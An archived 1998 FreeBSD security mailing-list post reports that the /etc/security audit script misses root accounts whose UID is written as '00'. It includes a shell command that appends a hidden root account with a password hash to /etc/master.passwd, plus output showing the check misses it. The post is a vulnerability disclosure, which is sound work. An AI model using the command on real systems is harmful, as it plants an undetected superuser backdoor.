From owner-freebsd-security Wed Jul 8 02:12:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA01988 for freebsd-security-outgoing; Wed, 8 Jul 1998 02:12:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Amnesiac.123.org (root@Amnesiac.mtl.pl [195.116.4.13]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA01929 for ; Wed, 8 Jul 1998 02:12:13 -0700 (PDT) (envelope-from mcl@Amnesiac.123.org) Received: from localhost (mcl@localhost) by Amnesiac.123.org (8.9.0/8.9.0) with SMTP id FAA08099 for ; Wed, 8 Jul 1998 05:23:49 +0200 (CEST) Date: Wed, 8 Jul 1998 05:23:45 +0200 (CEST) From: Michal Listos To: security@FreeBSD.ORG Subject: /etc/security weakness Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- 'bry While browsing through /etc/security I've discovered an ancient security hole. I though it was secured in 2.1.x, but it seems that I was wrong. /etc/security uses string mode comparision when checking for root accounts. It should use binary instead, shouldn't it? [783](root@Amnesiac ~)# echo 'hoot:$1$8rSeV$Vibbz.ILt9JsZZouefmnQ1:00:0::0:0:hidden root account:/root/:/bin/sh' >> /etc/master.passwd [784](root@Amnesiac ~)# awk 'BEGIN {FS=":"} $3=="0" {print $1,$3}' /etc/master.passwd root 0 jrewt 0 toor 0 [786](root@Amnesiac ~)# - -- Michal "some people's lives almost entirely through computers." - - never had time to leave the machine to see one -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQCVAwUBNaLmRb1rJn1VyAj1AQGyyQQAhAh3gWCp5TILh5aEZp4z6Nzy8wrRMRbs gnOrwvHBrjouR8btZIUhUm6sYdRI7EK5yYlob7SGCY2a3hJgQrwK0+Rn5Thn4aHo zFlNOm15csRFAyf8Zg0RRFKcbVZ4Pm2bx9on5d5W1HjNctm4lDjeIAr9Sy3J5pdG zu7RkD448x4= =yXjb -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message